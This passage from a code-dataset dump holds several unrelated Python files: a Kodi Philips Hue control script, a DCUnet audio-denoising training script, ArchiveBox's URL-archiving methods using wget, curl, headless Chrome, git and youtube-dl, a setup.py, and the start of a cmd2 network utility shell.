json.load(f)\n default_data = get_profile_config_template()\n dict_merge(my_data, default_data)\n return my_data\n else:\n mydata = get_profile_config_template()\n mydata['index'] = index\n return mydata\n\n\ndef delete_profile_config(index):\n \"\"\"Delete the profile config file\"\"\"\n config_path = os.path.join(PROFILE_CONFIG_FOLDER_PATH, f\"{index}.json\")\n # File path\n file = Path(config_path)\n try:\n file.unlink()\n return True\n except OSError as e:\n print(\"Get Error: %s : %s\" % (file, e.strerror))\n\n return False\n\n\n# System\n\ndef get_system_config_template():\n return {\n \"profile\": {\n \"path\": os.path.join(SYSTEM_FOLDER_PATH, 'BrowserCache')\n }\n }\n\n\ndef save_system_config(data):\n config_dir = os.path.dirname(SYSTEM_CONFIG_PATH)\n os.makedirs(config_dir, exist_ok=True)\n\n with open(SYSTEM_CONFIG_PATH, \"w\") as f:\n json.dump(data, f, indent=2)\n\n\ndef load_system_config():\n if os.path.isfile(SYSTEM_CONFIG_PATH):\n with open(SYSTEM_CONFIG_PATH, \"r\") as f:\n my_data = json.load(f)\n default_data = get_system_config_template()\n dict_merge(my_data, default_data)\n return my_data\n else:\n return get_system_config_template()\n\n\ndef delete_system_config():\n # File path\n file = Path(SYSTEM_CONFIG_PATH)\n try:\n file.unlink()\n except OSError as e:\n print(\"Get Error: %s : %s\" % (file, e.strerror))\n","repo_name":"ontisme/Socializing","sub_path":"backend/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":6254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"41404604134","text":"#\n# Kodi Script plugin that handles the actions for the huecontrol\n#\n\nimport json\nimport httplib\nimport xbmc, xbmcgui, xbmcaddon\nimport subprocess,os\nimport sys\nfrom urlparse import urlparse, parse_qs\n\nimport hue\nimport huecontrol\nimport xbmccommon\nimport time\n\n\ndef recallScene(sceneName):\n briOnly = __addon__.getSetting(\"brightnessonly\" + sceneName) == \"true\"\n state = hueAddonSettings.data[\"scene\" + sceneName]\n logDebug(\"recall preset\" + sceneName + \": \" + str(state))\n\n bridge = hue.Bridge(ip=hueAddonSettings.data[\"bridgeip\"], id=hueAddonSettings.data[\"bridgeid\"],username=hueAddonSettings.data.get(\"bridgeusername\", None))\n bridge.setFullStateLights(state, xbmccommon.getConfiguredLampsList(), briOnly)\n\n\naddonId = sys.argv[0] # e.g. 
service.huecontrol\n\n__addon__ = xbmcaddon.Addon(id=xbmccommon.ADDON_ID)\n__addonpath__ = xbmc.translatePath(__addon__.getAddonInfo('path')).decode(\"utf-8\") # Translate path to change special:// protocol to a normal path\n__addonicon__ = os.path.join(__addonpath__, 'icon.png')\n__language__ = __addon__.getLocalizedString\n\n\nhueAddonSettings = xbmccommon.HueControlSettings()\nlogError = xbmccommon.logError\nlogDebug = xbmccommon.logDebug\n\nidx = 1\nparameters = {}\nparameters[\"action\"] = \"none\"\n\nwhile idx < len(sys.argv):\n args = sys.argv[idx].split('=')\n parameters[args[0]] = args[1]\n idx += 1\n\nif (parameters['action'] == \"none\"):\n # No action parameter, so must be run from programs thingy.\n # Lets show presets\n parameters['action'] = \"showpresets\"\n\n\n \nif (parameters['action'] == \"connect_to_bridge\"):\n \n progress = xbmcgui.DialogProgress()\n progress.create(__language__(30007), __language__(30008))\n progress.update(0)\n \n bridges = hue.BridgeLocator(iprange=xbmc.getIPAddress(), logfunc=logDebug).FindBridges(progress=progress.update)\n bridgeidx = -1;\n \n progress.close();\n \n if (len(bridges) == 0):\n xbmcgui.Dialog().ok(__language__(30009), __language__(30010)) \n elif (len(bridges) == 1):\n # Only one bridge, done\n bridgeidx = 0\n bridge = bridges[bridgeidx]\n xbmccommon.notify(__language__(30011).format(bridge.name)) # Keep output on one line. Name is name + IP e.g. Philips hue (111.112.113.114)\n else:\n dialog = xbmcgui.Dialog()\n \n bridgenames = [\"{0} - {1} ({2})\".format(bridge.name, bridge.id[-6:].upper(), bridge.ip) for bridge in bridges]\n bridgeidx = dialog.select(__language__(30020).format(len(bridgenames)), bridgenames)\n \n if (bridgeidx >= 0):\n\n bridge = bridges[bridgeidx]\n bridge.logfunc = logDebug\n if (\"bridgeusername\" in hueAddonSettings.data):\n bridge.username = hueAddonSettings.data[\"bridgeusername\"]\n bridge.devicetype = huecontrol.DEVICETYPE.format(xbmc.getInfoLabel('System.FriendlyName') )\n \n xbmc.log(msg='Selected bridge {0} = {1}'.format(bridgeidx, bridge))\n \n hueAddonSettings.data[\"bridgeip\"] = bridge.ip\n hueAddonSettings.data[\"bridgeid\"] = bridge.id\n \n if (not bridge.isAuthorized()):\n # Perform authorization part\n # Use progress dialog to have a button with a cancel button\n progress = xbmcgui.DialogProgress()\n progress.create(__language__(30013), __language__(30014))\n progress.update(0)\n \n maxcount = 60\n count = 0\n while count < maxcount:\n progress.update(int((100.0/maxcount) * count), __language__(30014), __language__(30015).format(maxcount - count))\n result = bridge.authorize()\n \n if result == 0 or progress.iscanceled():\n # done, break loop\n count = maxcount\n \n count = count + 1\n time.sleep(1)\n \n progress.close();\n \n if (not bridge.isAuthorized()):\n xbmccommon.notify(__language__(30016), duration=5000)\n else:\n hueAddonSettings.data[\"bridgeusername\"] = bridge.username\n # For safety remove any old (fixed) usernames\n bridge.DELETE(\"/config/whitelist/{0}\".format(huecontrol.OLD_BRIDGEUSER))\n \n xbmccommon.notify(__language__(30017), duration=5000)\n \n hueAddonSettings.store()\n \nelif (parameters['action'] == \"savescene\"):\n \n bridge = hue.Bridge(ip=hueAddonSettings.data[\"bridgeip\"], id=hueAddonSettings.data[\"bridgeid\"], username=hueAddonSettings.data.get(\"bridgeusername\", None))\n \n state = bridge.getFullState()\n\n id = parameters['id']\n logDebug(\"save scene\" + id + \": \" + str(state))\n __addon__.setSetting(\"scene\" + id, \"\") # I used to store the complete 
state here, write an empty string now, to \"unbloat\" the settings.xml\n hueAddonSettings.data[\"scene\" + id] = state\n \n if hueAddonSettings.store():\n presetname = __addon__.getSetting(\"namescene\" + id)\n if presetname == \"\":\n presetname = id\n xbmccommon.notify(__language__(30034).format(presetname))\n\nelif (parameters['action'] == \"recallscene\"):\n\n recallScene(parameters['id'])\n\nelif (parameters['action'] == \"showpresets\"):\n\n dialog = xbmcgui.Dialog()\n \n presetnames = []\n \n presetnames.append(__language__(30030)) # Playing\n presetnames.append(__language__(30040)) # Paused\n \n for i in range(huecontrol.NUM_PRESETS):\n logDebug(\"namescene\" + str(i+1) + \" - \" + __addon__.getSetting(\"namescenePreset\" + str(i+1)))\n presetnames.append (__addon__.getSetting(\"namescenePreset\" + str(i+1)))\n \n idx = dialog.select(__language__(30202), presetnames)\n \n if idx >= 0:\n # Assume one of the presets\n presetId = \"Preset\" + str(idx+1-2)\n \n if idx == 0:\n presetId = \"Playing\"\n if idx == 1:\n presetId = \"Paused\"\n\n recallScene(presetId)\n \n","repo_name":"mvdwetering/service.huecontrol","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} {"seq_id":"17408959472","text":"import torch\nfrom torch.utils.data.dataset import random_split\nfrom torchaudio import datasets\n\nfrom dcunet.dcunet import DCUnet10\nfrom dcunet.train import train, wsdr_fn\nfrom utils.data import get_data, preprocess, WrappedDataLoader\n\ndev = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\ndataset = datasets.VCTK_092(root=\"data\", download=False)\n\nds_size = len(dataset)\ntrain_i = int(0.1 * ds_size)\ntrain_i += train_i % 2\nval_i = int(0.11 * ds_size) - train_i\nval_i += val_i % 2\ntest_i = int(0.12 * ds_size) - train_i - val_i\ntest_i += test_i % 2\nother = ds_size - train_i - val_i - test_i\n\ntrain_ds, val_ds, test_ds, other = random_split(dataset, lengths=[train_i, val_i, test_i, other],\n generator=torch.Generator().manual_seed(42))\n\nbatch_size = 1\nSAMPLE_RATE = 48000\nN_FFT = SAMPLE_RATE * 64 // 1000 + 4\nHOP_LENGTH = SAMPLE_RATE * 16 // 1000 + 4\nzero_q = 0.9\nzero_f = 0.2\none_q = 0.9\none_f = 0.5\n\ntrain_dl, val_dl, test_dl = get_data(train_ds, val_ds, test_ds, batch_size)\ntrain_dl = WrappedDataLoader(train_dl, preprocess, HOP_LENGTH, dev, zero_q=zero_q, zero_f=zero_f, one_q=one_q,\n one_f=one_f)\nval_dl = WrappedDataLoader(val_dl, preprocess, HOP_LENGTH, dev, zero_q=zero_q, zero_f=zero_f, one_q=one_q, one_f=one_f)\ntest_dl = WrappedDataLoader(test_dl, preprocess, HOP_LENGTH, dev, zero_q=zero_q, zero_f=zero_f, one_q=one_q,\n one_f=one_f)\n\ndcunet10 = DCUnet10(N_FFT, HOP_LENGTH).to(dev)\n\nloss_fn = wsdr_fn\noptimizer = torch.optim.Adam(dcunet10.parameters(), lr=1e-4)\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.1)\n\ntrain_losses, test_losses = train(dcunet10, train_dl, val_dl, loss_fn, optimizer, scheduler, 100, dev)\n","repo_name":"alexander-prutko/mil-audio-denoising","sub_path":"main_dcunet.py","file_name":"main_dcunet.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"36777171901","text":"import os\n\nfrom collections import defaultdict\nfrom datetime import datetime\n\nfrom index import (\n write_link_index,\n patch_links_index,\n load_json_link_index,\n)\nfrom 
config import (\n CURL_BINARY,\n GIT_BINARY,\n WGET_BINARY,\n YOUTUBEDL_BINARY,\n FETCH_FAVICON,\n FETCH_TITLE,\n FETCH_WGET,\n FETCH_WGET_REQUISITES,\n FETCH_PDF,\n FETCH_SCREENSHOT,\n FETCH_DOM,\n FETCH_WARC,\n FETCH_GIT,\n FETCH_MEDIA,\n SUBMIT_ARCHIVE_DOT_ORG,\n TIMEOUT,\n MEDIA_TIMEOUT,\n ANSI,\n OUTPUT_DIR,\n GIT_DOMAINS,\n GIT_SHA,\n WGET_USER_AGENT,\n CHECK_SSL_VALIDITY,\n COOKIES_FILE,\n WGET_AUTO_COMPRESSION\n)\nfrom util import (\n domain,\n extension,\n without_query,\n without_fragment,\n fetch_page_title,\n is_static_file,\n TimedProgress,\n chmod_file,\n wget_output_path,\n chrome_args,\n check_link_structure,\n run, PIPE, DEVNULL\n)\nfrom logs import (\n log_link_archiving_started,\n log_link_archiving_finished,\n log_archive_method_started,\n log_archive_method_finished,\n)\n\n\n\nclass ArchiveError(Exception):\n def __init__(self, message, hints=None):\n super().__init__(message)\n self.hints = hints\n\n\ndef archive_link(link_dir, link):\n \"\"\"download the DOM, PDF, and a screenshot into a folder named after the link's timestamp\"\"\"\n\n ARCHIVE_METHODS = (\n ('title', should_fetch_title, fetch_title),\n ('favicon', should_fetch_favicon, fetch_favicon),\n ('wget', should_fetch_wget, fetch_wget),\n ('pdf', should_fetch_pdf, fetch_pdf),\n ('screenshot', should_fetch_screenshot, fetch_screenshot),\n ('dom', should_fetch_dom, fetch_dom),\n ('git', should_fetch_git, fetch_git),\n ('media', should_fetch_media, fetch_media),\n ('archive_org', should_fetch_archive_dot_org, archive_dot_org),\n )\n \n try:\n is_new = not os.path.exists(link_dir)\n if is_new:\n os.makedirs(link_dir)\n\n link = load_json_link_index(link_dir, link)\n log_link_archiving_started(link_dir, link, is_new)\n stats = {'skipped': 0, 'succeeded': 0, 'failed': 0}\n\n for method_name, should_run, method_function in ARCHIVE_METHODS:\n if method_name not in link['history']:\n link['history'][method_name] = []\n \n if should_run(link_dir, link):\n log_archive_method_started(method_name)\n\n result = method_function(link_dir, link)\n link['history'][method_name].append(result)\n\n stats[result['status']] += 1\n log_archive_method_finished(result)\n else:\n stats['skipped'] += 1\n\n # print(' ', stats)\n\n write_link_index(link_dir, link)\n patch_links_index(link)\n log_link_archiving_finished(link_dir, link, is_new, stats)\n\n except Exception as err:\n print(' ! 
Failed to archive link: {}: {}'.format(err.__class__.__name__, err))\n raise\n \n return link\n\n\n### Archive Method Functions\n\ndef should_fetch_title(link_dir, link):\n # if link already has valid title, skip it\n if link['title'] and not link['title'].lower().startswith('http'):\n return False\n\n if is_static_file(link['url']):\n return False\n\n return FETCH_TITLE\n\ndef fetch_title(link_dir, link, timeout=TIMEOUT):\n \"\"\"try to guess the page's title from its content\"\"\"\n\n output = None\n cmd = [\n CURL_BINARY,\n link['url'],\n '|',\n 'grep',\n '',\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n output = fetch_page_title(link['url'], timeout=timeout, progress=False)\n if not output:\n raise ArchiveError('Unable to detect page title')\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\n\ndef should_fetch_favicon(link_dir, link):\n if os.path.exists(os.path.join(link_dir, 'favicon.ico')):\n return False\n\n return FETCH_FAVICON\n\ndef fetch_favicon(link_dir, link, timeout=TIMEOUT):\n \"\"\"download site favicon from google's favicon api\"\"\"\n\n output = 'favicon.ico'\n cmd = [\n CURL_BINARY,\n '--max-time', str(timeout),\n '--location',\n '--output', output,\n *(() if CHECK_SSL_VALIDITY else ('--insecure',)),\n 'https://www.google.com/s2/favicons?domain={}'.format(domain(link['url'])),\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n run(cmd, stdout=PIPE, stderr=PIPE, cwd=link_dir, timeout=timeout)\n chmod_file(output, cwd=link_dir)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef should_fetch_wget(link_dir, link):\n output_path = wget_output_path(link)\n if output_path and os.path.exists(os.path.join(link_dir, output_path)):\n return False\n\n return FETCH_WGET\n\n\ndef fetch_wget(link_dir, link, timeout=TIMEOUT):\n \"\"\"download full site using wget\"\"\"\n\n if FETCH_WARC:\n warc_dir = os.path.join(link_dir, 'warc')\n os.makedirs(warc_dir, exist_ok=True)\n warc_path = os.path.join('warc', str(int(datetime.now().timestamp())))\n\n # WGET CLI Docs: https://www.gnu.org/software/wget/manual/wget.html\n output = None\n cmd = [\n WGET_BINARY,\n # '--server-response', # print headers for better error parsing\n '--no-verbose',\n '--adjust-extension',\n '--convert-links',\n '--force-directories',\n '--backup-converted',\n '--span-hosts',\n '--no-parent',\n '-e', 'robots=off',\n '--restrict-file-names=windows',\n '--timeout={}'.format(timeout),\n *(('--compression=auto',) if WGET_AUTO_COMPRESSION else ()),\n *(() if FETCH_WARC else ('--timestamping',)),\n *(('--warc-file={}'.format(warc_path),) if FETCH_WARC else ()),\n *(('--page-requisites',) if FETCH_WGET_REQUISITES else ()),\n *(('--user-agent={}'.format(WGET_USER_AGENT),) if WGET_USER_AGENT else ()),\n *(('--load-cookies', COOKIES_FILE) if COOKIES_FILE else ()),\n *((() if CHECK_SSL_VALIDITY else ('--no-check-certificate', '--no-hsts'))),\n link['url'],\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=PIPE, cwd=link_dir, timeout=timeout)\n output = wget_output_path(link)\n\n # parse out number of files downloaded from last line of stderr:\n # \"Downloaded: 76 files, 4.0M in 1.6s (2.52 MB/s)\"\n 
output_tail = [\n line.strip()\n for line in (result.stdout + result.stderr).decode().rsplit('\\n', 3)[-3:]\n if line.strip()\n ]\n files_downloaded = (\n int(output_tail[-1].strip().split(' ', 2)[1] or 0)\n if 'Downloaded:' in output_tail[-1]\n else 0\n )\n\n # Check for common failure cases\n if result.returncode > 0 and files_downloaded < 1:\n hints = (\n 'Got wget response code: {}.'.format(result.returncode),\n *output_tail,\n )\n if b'403: Forbidden' in result.stderr:\n raise ArchiveError('403 Forbidden (try changing WGET_USER_AGENT)', hints)\n if b'404: Not Found' in result.stderr:\n raise ArchiveError('404 Not Found', hints)\n if b'ERROR 500: Internal Server Error' in result.stderr:\n raise ArchiveError('500 Internal Server Error', hints)\n raise ArchiveError('Got an error from the server', hints)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef should_fetch_pdf(link_dir, link):\n if is_static_file(link['url']):\n return False\n \n if os.path.exists(os.path.join(link_dir, 'output.pdf')):\n return False\n\n return FETCH_PDF\n\n\ndef fetch_pdf(link_dir, link, timeout=TIMEOUT):\n \"\"\"print PDF of site to file using chrome --headless\"\"\"\n\n output = 'output.pdf'\n cmd = [\n *chrome_args(TIMEOUT=timeout),\n '--print-to-pdf',\n link['url'],\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=PIPE, cwd=link_dir, timeout=timeout)\n\n if result.returncode:\n hints = (result.stderr or result.stdout).decode()\n raise ArchiveError('Failed to print PDF', hints)\n \n chmod_file('output.pdf', cwd=link_dir)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef should_fetch_screenshot(link_dir, link):\n if is_static_file(link['url']):\n return False\n \n if os.path.exists(os.path.join(link_dir, 'screenshot.png')):\n return False\n\n return FETCH_SCREENSHOT\n\ndef fetch_screenshot(link_dir, link, timeout=TIMEOUT):\n \"\"\"take screenshot of site using chrome --headless\"\"\"\n\n output = 'screenshot.png'\n cmd = [\n *chrome_args(TIMEOUT=timeout),\n '--screenshot',\n link['url'],\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=PIPE, cwd=link_dir, timeout=timeout)\n\n if result.returncode:\n hints = (result.stderr or result.stdout).decode()\n raise ArchiveError('Failed to take screenshot', hints)\n\n chmod_file(output, cwd=link_dir)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef should_fetch_dom(link_dir, link):\n if is_static_file(link['url']):\n return False\n \n if os.path.exists(os.path.join(link_dir, 'output.html')):\n return False\n\n return FETCH_DOM\n \ndef fetch_dom(link_dir, link, timeout=TIMEOUT):\n \"\"\"print HTML of site to file using chrome --dump-html\"\"\"\n\n output = 'output.html'\n output_path = os.path.join(link_dir, output)\n cmd = [\n *chrome_args(TIMEOUT=timeout),\n '--dump-dom',\n link['url']\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n with open(output_path, 'w+') as f:\n result = run(cmd, stdout=f, stderr=PIPE, cwd=link_dir, timeout=timeout)\n\n if 
result.returncode:\n hints = result.stderr.decode()\n raise ArchiveError('Failed to fetch DOM', hints)\n\n chmod_file(output, cwd=link_dir)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef should_fetch_git(link_dir, link):\n if is_static_file(link['url']):\n return False\n\n if os.path.exists(os.path.join(link_dir, 'git')):\n return False\n\n is_clonable_url = (\n (domain(link['url']) in GIT_DOMAINS)\n or (extension(link['url']) == 'git')\n )\n if not is_clonable_url:\n return False\n\n return FETCH_GIT\n\n\ndef fetch_git(link_dir, link, timeout=TIMEOUT):\n \"\"\"download full site using git\"\"\"\n\n output = 'git'\n output_path = os.path.join(link_dir, 'git')\n os.makedirs(output_path, exist_ok=True)\n cmd = [\n GIT_BINARY,\n 'clone',\n '--mirror',\n '--recursive',\n *(() if CHECK_SSL_VALIDITY else ('-c', 'http.sslVerify=false')),\n without_query(without_fragment(link['url'])),\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=PIPE, cwd=output_path, timeout=timeout + 1)\n\n if result.returncode == 128:\n # ignore failed re-download when the folder already exists\n pass\n elif result.returncode > 0:\n hints = 'Got git response code: {}.'.format(result.returncode)\n raise ArchiveError('Failed git download', hints)\n\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\n\ndef should_fetch_media(link_dir, link):\n if is_static_file(link['url']):\n return False\n\n if os.path.exists(os.path.join(link_dir, 'media')):\n return False\n\n return FETCH_MEDIA\n\ndef fetch_media(link_dir, link, timeout=MEDIA_TIMEOUT):\n \"\"\"Download playlists or individual video, audio, and subtitles using youtube-dl\"\"\"\n\n output = 'media'\n output_path = os.path.join(link_dir, 'media')\n os.makedirs(output_path, exist_ok=True)\n cmd = [\n YOUTUBEDL_BINARY,\n '--write-description',\n '--write-info-json',\n '--write-annotations',\n '--yes-playlist',\n '--write-thumbnail',\n '--no-call-home',\n '--no-check-certificate',\n '--all-subs',\n '--extract-audio',\n '--keep-video',\n '--ignore-errors',\n '--geo-bypass',\n '--audio-format', 'mp3',\n '--audio-quality', '320K',\n '--embed-thumbnail',\n '--add-metadata',\n *(() if CHECK_SSL_VALIDITY else ('--no-check-certificate',)),\n link['url'],\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=PIPE, cwd=output_path, timeout=timeout + 1)\n chmod_file(output, cwd=link_dir)\n if result.returncode:\n if (b'ERROR: Unsupported URL' in result.stderr\n or b'HTTP Error 404' in result.stderr\n or b'HTTP Error 403' in result.stderr\n or b'URL could be a direct video link' in result.stderr\n or b'Unable to extract container ID' in result.stderr):\n # These happen too frequently on non-media pages to warrant printing to console\n pass\n else:\n hints = (\n 'Got youtube-dl response code: {}.'.format(result.returncode),\n *result.stderr.decode().split('\\n'),\n )\n raise ArchiveError('Failed to download media', hints)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\n\ndef 
should_fetch_archive_dot_org(link_dir, link):\n if is_static_file(link['url']):\n return False\n\n if os.path.exists(os.path.join(link_dir, 'archive.org.txt')):\n # if open(path, 'r').read().strip() != 'None':\n return False\n\n return SUBMIT_ARCHIVE_DOT_ORG\n\ndef archive_dot_org(link_dir, link, timeout=TIMEOUT):\n \"\"\"submit site to archive.org for archiving via their service, save returned archive url\"\"\"\n\n output = 'archive.org.txt'\n archive_org_url = None\n submit_url = 'https://web.archive.org/save/{}'.format(link['url'])\n cmd = [\n CURL_BINARY,\n '--location',\n '--head',\n '--user-agent', 'ArchiveBox/{} (+https://github.com/pirate/ArchiveBox/)'.format(GIT_SHA), # be nice to the Archive.org people and show them where all this ArchiveBox traffic is coming from\n '--max-time', str(timeout),\n *(() if CHECK_SSL_VALIDITY else ('--insecure',)),\n submit_url,\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=DEVNULL, cwd=link_dir, timeout=timeout)\n content_location, errors = parse_archive_dot_org_response(result.stdout)\n if content_location:\n archive_org_url = 'https://web.archive.org{}'.format(content_location[0])\n elif len(errors) == 1 and 'RobotAccessControlException' in errors[0]:\n archive_org_url = None\n # raise ArchiveError('Archive.org denied by {}/robots.txt'.format(domain(link['url'])))\n elif errors:\n raise ArchiveError(', '.join(errors))\n else:\n raise ArchiveError('Failed to find \"content-location\" URL header in Archive.org response.')\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n if not isinstance(output, Exception):\n # instead of writing None when archive.org rejects the url write the\n # url to resubmit it to archive.org. This is so when the user visits\n # the URL in person, it will attempt to re-archive it, and it'll show the\n # nicer error message explaining why the url was rejected if it fails.\n archive_org_url = archive_org_url or submit_url\n with open(os.path.join(link_dir, output), 'w', encoding='utf-8') as f:\n f.write(archive_org_url)\n chmod_file('archive.org.txt', cwd=link_dir)\n output = archive_org_url\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef parse_archive_dot_org_response(response):\n # Parse archive.org response headers\n headers = defaultdict(list)\n\n # lowercase all the header names and store in dict\n for header in response.splitlines():\n if b':' not in header or not header.strip():\n continue\n name, val = header.decode().split(':', 1)\n headers[name.lower().strip()].append(val.strip())\n\n # Get successful archive url in \"content-location\" header or any errors\n content_location = headers['content-location']\n errors = headers['x-archive-wayback-runtime-error']\n return content_location, errors\n","repo_name":"nugsazz/ArchiveBox","sub_path":"archivebox/archive_methods.py","file_name":"archive_methods.py","file_ext":"py","file_size_in_byte":18495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23510218505","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"bioviz\",\n version=\"0.1.dev1\",\n author=\"Rebeka Tresnyics, Dr. 
Nandor Poka\",\n author_email=\"trebeka98@gmail.com, np@np-bio.info\",\n description=\"Visualize biological data using Bokeh\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/BioWiz/msa\",\n packages=setuptools.find_packages(),\n include_package_data=True,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Intended Audience :: Science/Research\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n \"Topic :: Scientific/Engineering :: Visualization\"\n ],\n python_requires='>=3.7',\n install_requires=['biopython==1.78', 'bokeh==2.2.1', 'selenium==3.141.0','diffimg==0.3.0' ]\n)\n","repo_name":"BioWiz/msa","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15703442902","text":"#!/usr/bin/env python\nimport cmd2\nfrom cmd2 import categorize\nimport subprocess\nimport re\nimport requests\nimport platform\nimport csv\nimport calendar\nimport webbrowser\n#import pathlib\nfrom pythonping import ping\nfrom datetime import datetime\nfrom rich.console import Console\nfrom rich.table import Table\nfrom rich import print\nfrom tcp_latency import measure_latency\nimport ipaddress\nfrom ipaddress import ip_network\nfrom time import sleep\nfrom progress.spinner import MoonSpinner\n\nfrom swiss_conf import *\nimport swiss_func\n\nOPERATING_SYSTEM = platform.system()\nRICH_CONSOLE = Console()\nCURRENT_TIME = datetime.now()\nCLOCK_TIME = CURRENT_TIME.strftime(CLOCK_FORMAT)\nIP_REGEX = \"\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}\"\nFIREFOX_PATH=\"C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\"\nwebbrowser.register('firefox', None,webbrowser.BackgroundBrowser(FIREFOX_PATH))\n\n# Pre cmd-loop\n# Banner ascii\nswiss_func.show_motd()\n# IP list using psutils\nif IP_BANNER == True:\n swiss_func.list_interfaces()\nelse:\n pass\n# Subprocess the shell command like route print or ip route\nswiss_func.list_routes()\n\n# Cmd loop app\nclass SwissKnife(cmd2.Cmd):\n prompt = \"# \"\n intro = ''\n\n # Pulling mac vendor from https://api.macvendors.com/FC:FB:FB:01:FA:21\n def do_macvendor(selg, args):\n try:\n print(requests.get(\"https://api.macvendors.com/\" + args).text)\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n # Print current time and a small calendar\n def do_time(self, _):\n CURRENT_TIME = datetime.now()\n year = CURRENT_TIME.strftime(\"%Y\")\n month = CURRENT_TIME.strftime(\"%m\")\n print(CLOCK_TIME)\n print(calendar.month(int(year), int(month)))\n\n # nslookup of a host\n nslookup_parser = cmd2.Cmd2ArgumentParser()\n nslookup_parser.add_argument(dest='value', type=str, help='DNS lookup of a hostname')\n @cmd2.with_argparser(nslookup_parser)\n def do_nslookup(self, args):\n nslookup_cmd = subprocess.run([\"nslookup\", args.value], stdout=subprocess.PIPE)\n print(nslookup_cmd.stdout.decode('utf-8', 'ignore'))\n\n # subnet printer from decimal value\n subnet_parser = cmd2.Cmd2ArgumentParser()\n subnet_parser.add_argument(dest='value', type=int, help='From integer to subnet')\n @cmd2.with_argparser(subnet_parser)\n def do_subnet(self, args):\n mask = int(args.value)\n if mask > 32 or mask < 0:\n pass\n else:\n bin_train = \"00000000000000000000000000000000\"\n bin_train = bin_train.replace(\"0\",\"1\",mask)\n first_oct = int(bin_train[0:8],2)\n second_oct = 
int(bin_train[8:16],2)\n third_oct = int(bin_train[16:24],2)\n fourth_oct = int(bin_train[24:32],2)\n print (\"%s.%s.%s.%s\" % (first_oct, second_oct, third_oct, fourth_oct))\n\n # ipaddress — IPv4/IPv6 manipulation library\n ipcheck_parser = cmd2.Cmd2ArgumentParser()\n ipcheck_parser.add_argument(dest='ipcheck', type=str, nargs='?', help='Apply is_multicast, is_private etc.')\n @cmd2.with_argparser(ipcheck_parser)\n def do_ipcheck(self, args):\n only_ip = re.findall(IP_REGEX, args.ipcheck)\n print(only_ip[0])\n print(\"is_private: %s\\nis_multicast: %s\\nis_reserved: %s\" %\n (ipaddress.ip_address(only_ip[0]).is_private,\n ipaddress.ip_address(only_ip[0]).is_multicast,\n ipaddress.ip_address(only_ip[0]).is_reserved\n )\n )\n print(list(ip_network(args.ipcheck).hosts()))\n\n # Putty automation: the putty command will open an SSH connection by default with user admin and port 22, telnet is optional\n putty_parser = cmd2.Cmd2ArgumentParser()\n putty_parser.add_argument(dest='host', type=str)\n 